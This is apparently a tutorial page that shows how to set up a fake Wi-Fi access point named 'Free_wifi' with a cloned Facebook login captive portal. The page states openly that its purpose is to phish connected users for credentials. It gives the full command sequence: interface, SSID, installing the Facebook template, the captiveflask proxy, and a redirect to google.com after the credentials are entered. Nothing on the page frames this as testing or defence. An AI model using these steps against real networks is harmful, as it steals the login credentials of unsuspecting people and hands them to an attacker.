Using captive portal attack

Creating a fake access point with an extra captive portal

What can we do using a captive portal?

Basically, do phishing by cloning official login portals and trick or clients to give us credentials or sensitive information.

Configuration

First, we define the SSID (Name of the access point), interface and ignoring pydns_server.

In this case I'll be using a facebook captive portal to trick the users, so to install it just do the following.

use misc.extra_captiveflask
download

Now I'll select the facebook template.

install facebook # simple as that
back

Now we need to choose what proxy we want to use.
In this case we will use the captiveflask proxy.
Just type set proxy captiveflask

Here in the setting options, I'll type set captiveflask.force_redirect_to_url https://google.com
This will redirect the user to google.com once he types the requested credentials.

Victims phone

Attackers overview

Commands used

set interface wlan0
set ssid Free_wifi
use misc.extra_captiveflask
download
install facebook # simple as that
back
set proxy captiveflask
set captiveflask.force_redirect_to_url https://google.com
set captiveflask.facebook true
start

PreviousCreating a fake access point NextPulp scripts

Last updated 2 years ago

hashtagCreating a fake access point with an extra captive portal

hashtagConfiguration

hashtagVictims phone

hashtagAttackers overview

hashtagCommands used

Creating a fake access point with an extra captive portal

Configuration

Victims phone

Attackers overview

Commands used